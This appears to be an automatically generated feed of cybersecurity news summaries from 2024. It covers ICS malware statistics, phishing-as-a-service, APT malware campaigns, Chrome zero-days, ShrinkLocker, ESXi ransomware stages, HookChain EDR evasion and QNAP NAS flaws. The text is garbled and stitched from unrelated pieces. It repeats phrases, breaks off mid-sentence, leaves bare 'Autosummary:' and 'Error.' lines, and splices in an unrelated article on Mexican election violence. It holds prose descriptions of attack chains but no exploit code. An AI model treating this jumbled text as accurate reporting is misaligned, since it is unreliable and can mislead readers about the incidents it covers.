Financial services, manufacturing, energy/utilities, retail, and consulting entities located in the U.S., Canada, Germany, South Korea, and Norway have emerged as the top sectors targeted by the Greatness PhaaS. "These services offer advanced capabilities that appeal to attackers by saving them time on development and evasion tactics," Trellix researchers said. The attack method, called transparent phishing or adversary-in-the-middle (AitM) phishing, "uses Cloudflare Workers to act as a reverse proxy server for a legitimate login page, intercepting traffic between the victim and the login page to capture credentials, cookies, and tokens," Netskope researcher Jan Michael Alcantara said in a report. "Autosummary:
BlackBerry said it also discovered bash script versions and Python-based Windows binaries being served from the threat actor-controlled domain "apsdelhicantt[.]in" - swift_script.sh , a bash version of GLOBSHELL , a bash version of GLOBSHELL Silverlining.sh , an open-source command-and-control (C2) framework called Sliver , an open-source command-and-control (C2) framework called Sliver swift_uzb.sh , a script to gather files from a connected USB driver , a script to gather files from a connected USB driver afd.exe , an intermediate executable responsible for downloading win_hta.exe and win_service.exe , an intermediate executable responsible for downloading win_hta.exe and win_service.exe win_hta.exe and win_service.exe, two Windows versions of GLOBSHELL In what"s a sign of Transparent Tribe"s tactical evolution, phishing campaigns orchestrated in October 2023 have been observed making use of ISO images to deploy the Python-based remote access trojan that uses Telegram for C2 purposes. "Autosummary:
"Autosummary:
7.61% 5.84% -1.77 pp Spy Trojans, backdoors and keyloggers 3.86% 3.90% 0.04 pp Malicious documents (MSOffice + PDF) 2.02% 1.72% -0.30 pp Viruses 1.48% 1.56% 0.08 pp Worms 1.55% 1.51% -0.04 pp Miners in the form of executable filesfor Windows 0.84% 0.92% 0.08 pp Web miners running in browsers 0.45% 0.49% 0.04 pp Malware for AutoCAD 0.36% 0.41% 0.05 pp Ransomware 0.17% 0.15% -0.02 pp Main threat sources Internet 13.25% 12.24% -1.01pp Email clients 3.15% 3.04% -0.11pp Removable media 1.29% 1.13% -0.16pp Network folders 0.17% 0.15% -0.02pp Statistics across all threats In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 21.4%.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) OT network administration computers ICS software development computers We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context as can be seen in the charts above. Malicious object categories Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: Malicious objects used for initial infection Next-stage malware Self-propagating malware Malicious objects used for initial infection Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents. Change in percentage of ICS computers blocked by various categories of malicious objects in Q1 2024 Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects of various categories were blocked was as follows: AutoCAD malware – by 1.16 times. Percentage of ICS computers on which malicious objects were blocked, by month, 2021–2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 34.2% in Africa to 11.5% in Northern Europe. "Autosummary:
The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following: Internet threats Africa – 14.82% South-East Asia – 14.01% Email threats Southern Europe – 6.85% Latin America – 5.09% Denylisted internet resources The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were: Africa – 8.78% Russia – 7.49% South Asia – 7.48% Malicious scripts and phishing pages The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were: Latin America – 7.23% Southern Europe – 6.96% Middle East – 6.95% Malicious documents The leading regions by percentage of ICS computers on which malicious documents were blocked were: Southern Europe – 3.24% Latin America – 2.94% Eastern Europe – 2.33% Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.In similar regional rankings, worms are in fourth place in four regions: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% South Asia – 1.95% The top regions for worms were the leading regions by percentage of ICS computers on which threats were blocked when connecting removable media: Africa – 5.60% South Asia – 2.46% Viruses The leading regions by percentage of ICS computers on which viruses were blocked were: South-East Asia – 7.61% Africa – 4.09% East Asia – 2.89% In South-East Asia, viruses are in first place (!) Covert crypto-mining programs Web miners running in browsers The leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: Africa – 0.91% Middle East – 0.84% Australia and New Zealand – 0.78% In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place regionally (eighth place globally): Australia and New Zealand – 0.78% US and Canada – 0.45% Northern Europe – 0.27% In Q1 2024, the percentage of ICS computers on which web miners running in browsers were blocked increased in all regions except Russia and Central Asia. 20–25% Eastern Europe – 24.7% Russia – 23.6% Latin America – 23.5% South Asia – 23.5% Southern Europe – 21.4% East Asia – 20.3% Up to 20% Australia and New Zealand – 16.2% US and Canada – 13.3% Western Europe – 12.3% Northern Europe – 11.5% The third group contains the regions that are the safest in terms of cybersecurity. The three leading regions by percentage of ICS computers on which spyware was blocked were also the leading regions for malware from the first mentioned group: Africa – 6.65% Middle East – 5.89% Southern Europe – 5.45% In almost all regions, in the threat category rankings by percentage of ICS computers on which it was blocked, spyware does not rank higher than third place, except for two regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%.Compared to the global figures, the region has a significantly higher percentage of ICS computers on which the following was blocked: AutoCAD malware, by 6.8 times Viruses, by 4 times Spyware, by 1.3 times Malicious documents, by 1.3 times Ransomware, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: AutoCAD malware – by 1.4 times Viruses, by 1.2 times Current threats Viruses. Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.9 times Spyware, by 1.4 times Malicious scripts and phishing pages, by 1.2 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Miners in the form of executable files for Windows, by 1.7 times Web miners, by 1.6 times. Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Web miners, by 1.5 times Miners in the form of executable files for Windows, by 1.5 times Current threats Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Miners in the form of executable files for Windows Web miners The region is safe overall. South Asia – 2.46% Central Asia – 1.51% Worms The leading regions by percentage of ICS computers on which worms were blocked were: Africa – 5.29% Central Asia – 2.88% Middle East – 2.40% Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked. Spyware, by 1.5 times Viruses, by 1.5 times Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which covert crypto-mining malware was blocked: Web miners, by 1.3 times Miners in the form of executable files for Windows, by 1.2 times Current threats Ransomware From Q4 2022 through Q3 2023, the Middle East held second place in the regional ranking for this threat category. Compared to the global average, the region has a higher percentage of ICS computers on which the following was blocked: Malicious documents, by 1.7 times Malicious scripts and phishing pages, by 1.2 times Spyware, by 1.2 times Web miners Quarterly changes The largest quarterly increase was in the percentage of ICS computers on which the following was blocked: Spyware, by 1.3 times Denylisted internet resources are slowly growing for the second quarter in a row. Covert crypto-mining programs Miners in the form of executable files for Windows The leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were: Central Asia – 1.78% Russia – 1.38% Eastern Europe – 1.06% In the global rankings of threat categories by percentage of ICS computers on which they were blocked, miners in the form of Windows executable files are in seventh place. From a global perspective, it has a significantly higher percentage of ICS computers on which the following was blocked : Worms, by 3.5 times Viruses, by 2.6 times Spyware, by 1.7 times Ransomware, by 1.8 times Web miners, by 1.8 times Worms and viruses outpaced malicious documents in the threat category ranking by percentage of ICS computers on which they were blocked. Miners in the form of executable files for Windows, by 1.6 times AutoCAD malware – by 1.4 times Current threats Malicious scripts and phishing pages Q1 2024 saw an increase in the percentage of ICS computers on which the following threats were blocked: Web miners Miners in the form of executable files for Windows AutoCAD malware Based on the combination of indicators, the region is safe overall. All regions ranked by percentage of ICS computers on which malicious objects were blocked in the first quarter can be divided into three groups: Over 25% Africa – 32.4% South-East Asia – 29.7% Middle East – 26.9% Central Asia – 26.8% In the regions of this group, ICS cybersecurity requires close attention and improvement. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Viruses, by 1.9 times AutoCAD malware, by 3.6 times Quarterly changes Current threats Spyware Viruses AutoCAD malware It is likely that the active use of spyware by cybercriminals leads to a high percentage of compromised authentication data in industrial enterprise systems, which significantly increases the risks of subsequent targeted attacks. Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following was blocked: Ransomware, by 1.9 times Web miners, by 1.7 times Worms, by 1.6 times Worms were fourth in the ranking of malware categories by percentage of ICS computers on which they were blocked (sixth globally). "Autosummary:
Based on a number of sources, the report describes the magnitude of the problem: 61% increase in overall phishing attacks on enterprises in overall phishing attacks on enterprises 83% of organizations were subject to a successful phishing attack were subject to a successful phishing attack Over 1100% increase in phishing URLs hosted on legitimate SaaS platforms A Phishing Attack Breakdown: Where is the Protection Blind Spot? Deep Dive: Browser Security Platform and Deep Session Inspection 101 The key takeaway from the report is that IT and security experts should evaluate a browser security platform as part of their phishing protection stack. "Autosummary:
"Autosummary:
"Autosummary:
The types of data exposed in this incident include: Full name Date of birth Social Security Number (SSN) Email address Physical address Phone number Eligibility data Insurance identification number In a FAQ page on its site, Sav-Rx explains that it took them eight months to send out notices of breach to impacted customers because their initial priority was to minimize interruption to patient care before launching an investigation on the impact of the incident. "Autosummary:
"Autosummary:
Compromised data includes full name, date of birth, Social Security Number (SSN), email address, physical address, phone number, eligibility data, and insurance identification number. "Autosummary:
The Attacker has now developed a Windows version that merges with… https://t.co/Vi2sxZveGQ — 𝓙𝓪𝓬𝓴2 (@2RunJack2) April 2, 2024 Rapid7 published Indicators of Compromise (IoC) for this attack, below is the attack timeline: Feb 10, 2024:May 13, 2024: Rapid7 identifies an unlinked installer file containing malware, the second Viewer package, still being served by the official vendor site.May 12, 2024: Rapid7 discovers three additional malicious payloads being hosted on the threat actor’s C2 infrastructure over port 8000: chrome_installer.exe , firefox_updater.exe , and OneDriveStandaloneUpdater.exe . "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. YouTube has become a significant channel for cybercrime Social engineering threats – those which rely on human manipulation – account for most cyberthreats … More
The post Week in review: Google fixes yet another Chrome zero-day exploit, YouTube as a cybercrime channel appeared first on Help Net Security.
"Autosummary:
Microsoft has announced the Copilot+ line of Windows 11-powered PCs that, among other things, will have Recall, a feature that takes screenshots every few seconds, encrypts them, saves them, and leverages AI to allow users to search through them for specific content that has been viewed in apps, websites, documents, etc.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. "Autosummary:
"Autosummary:
CERT-UA warns of malware campaign conducted by threat actor UAC-0006 Pierluigi Paganini May 26, 2024 May 26, 2024 The Ukraine CERT-UA warns of a concerning increase in cyberattacks attributed to the financially-motivated threat actor UAC-0006. "Autosummary:
"Autosummary:
"Autosummary:
"Compared to the last quarter of 2023, data breaches rose from 81M to 435M in Q1 2024. That’s a 5-fold increase in just a few months. One of the most common ways data breaches happen is through apps like Facebook or Instagram, which collect a lot of user data. If their databases get compromised — so does the user data. To stay on top of your personal information security, try Surfshark’s advanced data security solution, … More
The post Product showcase: Alert – Data breach detector for your email, credit card, and ID appeared first on Help Net Security.
"Autosummary:
With Alert, you can easily monitor your most important credentials, such as your email, credit card, and ID.Monitoring your most important details, such as emails, credit cards, and IDs, is the best way to prevent cybercriminals from exploiting your information. "Autosummary:
Third actively exploited zero-day this month CVE-2024-5274 is the eighth actively exploited vulnerability that Google fixed in Chrome since the beginning of the year, and the third this month. "For the eighth time this year, Google has released an emergency update for its Chrome browser that fixes a zero-day vulnerability (CVE-2024-5274) with an in-the-wild exploit. About CVE-2024-5274 As per usual, Google keeps technical details of the vulnerability under wraps. All they tell us is that the vulnerability is a type confusion bug in V8, Chrome’s JavaScript and WebAssembly engine. “Google is aware that an exploit for CVE-2024-5274 exists in the wild,” the company says. … More
The post Google fixes yet another Chrome zero-day exploited in the wild (CVE-2024-5274) appeared first on Help Net Security.
"Autosummary:
"Illumio and Netskope announced a Zero Trust partnership that brings together the power of Zero Trust Segmentation (ZTS) and Zero Trust Network Access (ZTNA) to protect against breaches and build cyber resilience. The new partnership combines Illumio ZTS with Netskope ZTNA Next via the Netskope Cloud Exchange (CE) platform to enable network and security teams to create Zero Trust policies that consistently secure access at an organization’s perimeter and within its hybrid, multi-cloud infrastructure. In … More
The post Illumio and Netskope join forces to strengthen enterprise resilience against cyberattacks appeared first on Help Net Security.
"Autosummary:
Next, organizations gain a consistent, real-time view of user-to-application and application-to-application traffic, enabling them to better understand risk end-to-end. "Autosummary:
"Analysis of the installer JAVS Viewer Setup 8.3.7.250-1.exe showed that it was signed with an unexpected Authenticode signature and contained the binary fffmpeg.exe," Rapid7 researchers said, adding it "observed encoded PowerShell scripts being executed by the binary fffmpeg.exe." Both fffmpeg.exe and the installer have been signed by an Authenticode certificate issued to "Vanguard Tech Limited," as opposed to "Justice AV Solutions Inc," the signing entity used to authenticate the legitimate versions of the software. "Autosummary:
"Autosummary:
Since last year, the municipality of Eindhoven has been the subject of stricter supervision by the Dutch data protection authority, concerned that personal data has not been handled with enough care following some 200 other breaches of varying size and severity. "Autosummary:
"Autosummary:
CVE-2024-4671 - Use-after-free in Visuals - Use-after-free in Visuals CVE-2024-4761 - Out-of-bounds write in V8 - Out-of-bounds write in V8 CVE-2024-4947 - Type confusion in V8 Users are recommended to upgrade to Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux to mitigate potential threats. "Autosummary:
"Autosummary:
"Autosummary:
Through dynamic malware analysis, Kaspersky researchers were able to confirm the malware making the following registry changes: fDenyTSConnections = 1 : disables RDP connections : disables RDP connections scforceoption = 1 : enforces smart card authentication : enforces smart card authentication UseAdvancedStartup = 1 : requires the use of the BitLocker PIN for pre-boot authentication : requires the use of the BitLocker PIN for pre-boot authentication EnableBDEWithNoTPM = 1 : allows BitLocker without a compatible TPM chip : allows BitLocker without a compatible TPM chip UseTPM = 2 : allows the use of TPM if available : allows the use of TPM if available UseTPMPIN = 2 : allows the use of a startup PIN with TPM if available : allows the use of a startup PIN with TPM if available UseTPMKey = 2 : allows the use of a startup key with TPM if available : allows the use of a startup key with TPM if availableUseTPMKeyPIN = 2 : allows the use of a startup key and PIN with TPM if available : allows the use of a startup key and PIN with TPM if available EnableNonTPM = 1 : allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive : allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive UsePartialEncryptionKey = 2 : requires the use of a startup key with TPM : requires the use of a startup key with TPM UsePIN = 2: requires the use of a startup PIN with TPM The threat actor behind ShrinkLocker does not drop a ransom file to establish a communication channel with the victim. "Autosummary:
Google fixes eighth actively exploited Chrome zero-day this year, the third in a month Pierluigi Paganini May 24, 2024 May 24, 2024 Google rolled out a new emergency security update to fix another actively exploited zero-day vulnerability in the Chrome browser.(March 2024) CVE-2024-4671 : a use-after-free issue that resides in the Visuals component (May 2024). "Autosummary:
"Autosummary:
" The eight firms impacted by this breach, all using almost identical data breach notifications, are: The data breach notices warn that Cencora"s internal investigation, which concluded on April 10, 2024, confirmed that the following information had been exposed: full name, address, health diagnosis, medications, and prescriptions. "Within the last 12 months, 48% of organizations identified evidence of a successful breach within their environment, according to Arctic Wolf. To fully understand the gravity of this statistic, it is important to understand that, although 48% of these environments found evidence of a data breach, that does not inversely mean that 52% of organizations did not suffer a breach. Instead, it should be more accurately stated that the remaining 52% did not identify indicators … More
The post Ransomware fallout: 94% experience downtime, 40% face work stoppage appeared first on Help Net Security.
"Autosummary:
To fully understand the gravity of this statistic, it is important to understand that, although 48% of these environments found evidence of a data breach, that does not inversely mean that 52% of organizations did not suffer a breach. "In this Help Net Security video, Ryan Bell, Threat Intelligence Manager at Corvus Insurance, discusses how ransomware will continue to grow in 2024. In January, Corvus reported that global ransomware attacks in 2023 set a record high, surpassing 2022 by nearly 70 percent. Despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22 percent and 8 percent of the activity, respectively, the ransomware threat remains resilient. Our Q1 ransomware report … More
The post 2024 sees continued increase in ransomware activity appeared first on Help Net Security.
"Autosummary:
"As organizations in the healthcare sector continue to be a prime target for ransomware gangs and CISA warns about a vulnerability (CVE-2023-43208) in a healthcare-specific platform being leveraged by attackers, the Advanced Research Projects Agency for Health (ARPA-H) has announced the Universal PatchinG and Remediation for Autonomous DEfense (UPGRADE) program aimed at developing a vulnerability management platform for healthcare IT teams. CVE-2023-43208 exploited by ransomware threat actors CVE-2023-43208, an easily exploitable unauthenticated remote code execution … More
The post HHS pledges $50M for autonomous vulnerability management solution for hospitals appeared first on Help Net Security.
"Autosummary:
The goal of the UPGRADE program is to create a security platform that will adapt to any hospital environment, proactively and autonomously simulate/evaluate the risk and potential impact of vulnerabilities, procure or develop a patch, test it in a model environment, and deploy it in a way that’s minimally disruptive to medical, IT, and other devices in use at healthcare delivery organizations. "Autosummary:
Malachi Mullings, a 31-year-old from Sandy Springs, Georgia, was charged with opening 20 bank accounts in the name of a sham company, The Mullings Group LLC, to launder millions of dollars generated through fraudulent activity between 2019 and July 2021. "A critical, 10-out-of-10 vulnerability (CVE-2024-4985) allowing unrestricted access to vulnerable GitHub Enterprise Server (GHES) instances has been fixed by Microsoft-owned GitHub. Fortunately, there is a catch that may narrow down the pool of potential victims: instances are vulnerable to attack only if they use SAML single sign-on (SSO) authentication AND have the (optional) encrypted assertions feature enabled. About CVE-2024-4985 GitHub Enterprise Server is a software development platform that organizations host either on-premises or on a … More
The post GitHub fixes maximum severity Enterprise Server auth bypass bug (CVE-2024-4985) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The Chinese links to Operation Diplomatic Specter further stem from the use of operational infrastructure exclusively used by China-nexus groups like APT27, Mustang Panda, and Winnti, not to mention tools like the China Chopper web shell and PlugX. "The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks," the researchers concluded. "Autosummary:
This includes the following steps - Obtaining initial access through phishing attacks, malicious file downloads, and exploitation of known vulnerabilities in internet-facing assets Escalating their privileges to obtain credentials for ESXi hosts or vCenter using brute-force attacks or other methods Validating their access to the virtualization infrastructure and deploying the ransomware Deleting or encrypting backup systems, or in some cases, changing the passwords, to complicate recovery efforts Exfiltrating data to external locations such as Mega.io, Dropbox, or their own hosting services Initiating the execution of the ransomware to encrypt the "/vmfs/volumes" folder of the ESXi filesystem Propagating the ransomware to non-virtualized servers and workstations to widen the scope of the attack To mitigate the risks posed by such threats, it"s recommended for organizations to ensure adequate monitoring and logging are in place, create robust backup mechanisms, enforce strong authentication measures, and harden the environment, and implement network restrictions to prevent lateral movement. "Autosummary:
"Autosummary:
The sustained strategic intrusions by Chinese threat actors in Africa against key industrial sectors, such as telecom service providers, financial institutions, and governmental bodies, align with the nation"s technological agenda in the region, tying into its Digital Silk Road (DSR) project announced in 2015. "Autosummary:
SMS phishing sent to targets Source: Microsoft Once they gain access to the target environment using stolen accounts, they register their own devices with the company"s multi-factor authentication (MFA) platforms for persistence and then move laterally by compromising virtual machines, VPNs, SharePoint, OneDrive, Salesforce, and Citrix environments. "Autosummary:
"Autosummary:
"Autosummary:
"Associate Director, Cyber Security AstraZeneca | Sweden | On-site – View job details You will develop and implement security policies, procedures, and operating practices in this role. You will coordinate risk profile development and distribution to IT business-facing audiences and maintain compliance with all AstraZeneca Security Policy Framework requirements. You will support cyber risk assessments and make recommendations to IT leadership. Automotive Cyber Security Expert IDSafe | India | Hybrid – View job details In … More
The post Cybersecurity jobs available right now: May 22, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Security Consultant RINA | Italy | Hybrid – View job details As an IT Cyber Security Consultant, you will conduct penetration tests, engage in red teaming and OSINT, perform vulnerability assessments, craft reports, advise on security enhancements, present vulnerabilities to clients, analyze security configurations, develop hardening guidelines, support remediation strategies, and more. Biomedical Cybersecurity Specialist Queensland Health | Australia | Hybrid – View job details In this role, you’ll lead biomedical ICT and cybersecurity initiatives, provide training, design solutions, conduct risk assessments, manage security incidents, and ensure compliance. Senior Associate Cloud Data Engineer – Cybersecurity PwC | Argentina | On-site – View job details You will be part of a growing team driving strategic programs, data analytics, innovation, deals, cyber resilency, response, and technical implementation activities. "Autosummary:
" Another novel method is HookChain, which, as Brazilian security researcher Helvio Carvalho Junior, involves combining IAT hooking, dynamic system service numbers (SSN) resolution, and indirect system calls to escape monitoring and control mechanisms implemented by security software in the user mode, particularly in the NTDLL.dll library. A majority of the impacted servers are located in China, followed by Hong Kong, Netherlands, Japan, the U.S., Germany, South Africa, and Sweden. "Autosummary:
"Autosummary:
The company designs and develops digital imaging products for use in mobile phones, laptops, netbooks and webcams, security and surveillance cameras, entertainment, automotive and medical imaging systems.As proof of the data breach, the extortion group published data samples, including passport images, NDAs, contracts, and other documents. "Autosummary:
"Cyber actors, including advanced persistent threat (APT) groups, have targeted OT/ICS systems in recent years to achieve political gains, economic advantages, and possibly to execute destructive effects," the NSA noted in September 2022. "Autosummary:
It provides the full capabilities of GitHub, including source code management, version control, collaboration tools, and continuous integration and delivery (CI/CD), but allows organizations to host the platform on their own infrastructure. "Autosummary:
Regardless of the type of devices used, an ORB network has a set of essential components that allow it to work properly: Adversary Controlled Operations Server (ACOS) - server for administering nodes in an ORB network Relay node - lets users authenticate to the network and relay traffic through the larger traversal pool on ORB nodes Traversal nodes - the main nodes composing an ORB network, obfuscate the origin of the traffic Exit/Staging nodes - used to launch attacks on targets Victim server: victim infrastructure communicating with the node on the ORB network Enterprise defense challenges The use of ORBs has been observed in the past, the most prominent recent example being the Volt Typhoon attacks on US critical infrastructure organizations using SOHO network equipment (e.g. routers, firewalls, and VPN appliances). "Autosummary:
Cybercriminals are targeting elections in India with influence campaigns Pierluigi Paganini May 22, 2024 May 22, 2024 Resecurity warns of a surge in malicious cyber activity targeting the election in India, orchestrated by several independent hacktivist groups Resecurity has identified a spike of malicious cyber activity targeting the election in India, which is supported by multiple independent hacktivist groups who arrange cyber-attacks and publication of stolen personal identifiable information (PII) belonging to Indian citizens on the Dark Web. India, with a population of over 1.4 billion and a GDP of over 3.417 trillion USD, has become a prime target for cyberattacks during its general elections scheduled between 19 April and 1 June 2024. "Autosummary:
Some of the countries targeted by this campaign are Russia, the U.A.E., Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon. "Autosummary:
To do this, stop and disable the following services: VeeamEnterpriseManagerSvc (Veeam Backup Enterprise Manager) VeeamRESTSvc (Veeam RESTful API Service) Note: Do not stop the ‘Veeam Backup Server RESTful API Service’. "Autosummary:
The Mexican state where candidates are gunned down as they push for votes 3 hours ago Will Grant , Mexico and Central America correspondent in Guerrero Share BBC Cinthia Juarez is running for office in Acapulco after her friend, a famous gay rights activist, was murdered on the campaign trail In what is the most violent election campaign in Mexico’s history, the western state of Guerrero is the most dangerous place in the country to look for votes.He also denies the President’s security strategy – often summarised by his quote “abrazos, no balazos”, meaning “hugs, not bullets” – has failed: “That quote must be put into context”, he argues.But the small, fiercely determined woman, who is also a leading gay rights defender in her community, says she refuses to give into fear. "Autosummary:
“I am publicising this potential action today to, once again, highlight the need for all organisations to check, challenge and, where necessary, change disclosure procedures to ensure they have robust measures in place to protect the personal information people entrust to them.” "Autosummary:
In fact, there is a product sold on the dark web called FraudGPT, which allows criminals to make content to facilitate a range of frauds, including creating bank-related phishing emails, or to custom-make scam web pages designed to steal personal information.As part of his efforts, Mr Hoefnagels, who lives in Ontario, Canada, ran the scam or “phishing” emails his gran had received through popular AI chatbot ChatGPT."People are just not worried about being scammed" 3 hours ago Jane Wakefield , Technology reporter Share Clark Hoefnagels Clark Hoefnagels created an AI-powered tool that spots scam emails When Clark Hoefnagels’ grandmother was scammed out of $27,000 (£21,000) last year, he felt compelled to do something about it. "Autosummary:
Error. "This article includes excerpts from various reports that offer statistics and insights into the current phishing landscape. AI-driven phishing attacks deceive even the most aware users Zscaler | Zscaler ThreatLabz 2024 Phishing Report | May 2024 In 2023, the United States (55.9%), United Kingdom (5.6%) and India (3.9%) emerged as the top countries targeted by phishing scams. The finance and insurance sector experienced the highest number of overall phishing attempts, amounting to a 393% increase … More
The post Phishing statistics that will make you think twice before clicking appeared first on Help Net Security.
"Autosummary:
Proofpoint | 2024 State of the Phish | February 2024 And while the incidence of successful phishing attacks has slightly declined (71% of surveyed organizations experienced at least one successful attack in 2023 versus 84% the previous year), the negative consequences have soared: a 144% increase in reports of financial penalties, such as regulatory fines, and a 50% increase in reports of reputational damage. "Autosummary:
"Autosummary:
Accepted by vendor; no fix available (first reported December 12th 2023) Requires valid account on NAS device CVE-2024-27127 A double-free in utilRequest.cgi via the delete_share function Accepted by vendor; no fix available (first reported January 3rd 2024) Requires valid account on NAS device CVE-2024-27128 Stack overflow in check_email function, reachable via the share_file and send_share_mail actions of utilRequest.cgi (possibly others) leads to RCE Accepted by vendor; no fix available (first reported January 3rd 2024) Requires valid account on NAS device CVE-2024-27129 Unsafe use of strcpy in get_tree function of utilRequest.cgi leads to static buffer overflow and thus RCE Accepted by vendor; no fix available (first reported January 3rd 2024) Requires valid account on NAS device CVE-2024-27130 Unsafe use of strcpy in No_Support_ACL accessible by get_file_size function of share.cgi leads to stack buffer overflow and thus RCE Accepted by vendor; no fix available (first reported January 3rd 2024) Requires a valid NAS user to share a file CVE-2024-27131 Log spoofing via x-forwarded-for allows users to cause downloads to be recorded as requested from arbitrary source location Accepted by vendor; no fix available (first reported January 3rd 2024) Requires ability to download a file WT-2023-0050 N/A Under extended embargo due to unexpectedly complex issue N/A WT-2024-0004 Stored XSS via remote syslog messages No fix available (first reported January 8th 2024) Requires non-default configuration WT-2024-0005 Stored XSS via remote device discovery "Autosummary:
"The Tier 4 server is considered the central server of the operation, presumably used for effectively administering all downstream servers on a long-term basis," the cybersecurity firm said, adding it also observed the Tier 4 C2 server communicating with another "auxiliary server" via port 8033. "Autosummary:
Error. "Researchers have found 15 vulnerabilities in QNAP’s network attached storage (NAS) devices, and have released a proof-of-concept for one: an unauthenticated stack overflow vulnerability (CVE-2024-27130) that may be leveraged for remote code execution. The vulnerabilities and the CVE-2024-27130 PoC “With a codebase bearing some long 10+ year legacy, and a long history of security weaknesses,” QNAP’s QTS operating system and its “variants” (QuTSCloud and QTS hero) enticed WatchTowr Labs researchers to probe for vulnerabilities. “Given … More
The post 15 QNAP NAS bugs and one PoC disclosed, update ASAP! (CVE-2024-27130) appeared first on Help Net Security.
"Autosummary:
“We can, of course, verify this expectation by turning to a quick-and-dirty google dork, which finds a whole bunch of ssids, verifying our assumption that sharing a file with the entire world is something that is done frequently by NAS users.” "Autosummary:
Each of these scripts, in turn, is employed to run two different PowerShell scripts "Tmp912.tmp" and "Tmp703.tmp," which are used to connect to an actor-controlled Dropbox and Google Drive account and download two more PowerShell scripts referred to as "tmpdbx.ps1" and "zz.ps1" The VB scripts are then configured to run the newly downloaded PowerShell scripts and fetch more files from the cloud services, including binaries that could be executed depending on the system policies. "Autosummary:
Blackbasta group claims to have hacked Atlas, one of the largest US oil distributors Pierluigi Paganini May 21, 2024 May 21, 2024 The Blackbasta extortion group claims to have hacked Atlas, one of the largest national distributors of fuel in the United States. "Autosummary:
" London Drugs added that they will not and cannot pay the ransom requested by LockBit, but acknowledged that the gang "may leak stolen London Drugs corporate files, some of which may contain employee information on the Dark Web." "At this stage in our investigation, we are not able to provide specifics on the nature or extent of employee personal information potentially impacted. "Autosummary:
This intrusion was only discovered much later, in January 2024, with the University"s IT team shutting the unauthorized access and launching an internal investigation into the incident, also involving specialists from the NSW Police, CrowdStrike, and CyberCX. "Autosummary:
"Autosummary:
According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "Autosummary:
"Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. This was primarily driven by an explosion in “indirect” ransomware incidents which increased by more than 415% in 2023 than in 2022. Standing out among the biggest loss drivers were remote access tools, which accounted for 58% of ransomware attacks. Double leverage attacks – those using both data encryption and exfiltration – … More
The post Cybercriminals shift tactics to pressure more victims into paying ransoms appeared first on Help Net Security.
"Autosummary:
Ransomware didn’t just grow in the US in 2023, it evolved, with the frequency of ransomware claims jumping 64% year-over-year, according to At-Bay. "The Jumio 2024 Online Identity Study reveals significant consumer concerns about the risks posed by generative AI and deepfakes, including the potential for increased cybercrime and identity fraud. The study examined the views of more than 8,000 adult consumers, split evenly across the United Kingdom, United States, Singapore and Mexico. The results suggest nearly 72% worry on a day-to-day basis about being fooled by a deepfake into handing over sensitive information or money. Only 15% … More
The post Consumers continue to overestimate their ability to spot deepfakes appeared first on Help Net Security.
"Autosummary:
More than 80% of Singapore consumers said they’d be willing to spend more time on identity verification if those measures improve security in industries including financial services (85%), the sharing economy (85%), healthcare (85%), government (84%), travel and hospitality (84%), retail and ecommerce (83%), social media (82%) and telecoms (82%). "While some may associate cyber risks primarily with technology and data breaches, they can also lead to brand or reputational harm, reduced productivity, and financial losses. This Help Net Security round-up presents excerpts from previously recorded videos featuring security experts covering a spectrum of cyber risk trends, ranging from threats to large language models and supply chains to social engineering tactics and the proliferation of celebrity audio deepfakes. Complete videos Melissa Bischoping, Director, Endpoint Security … More
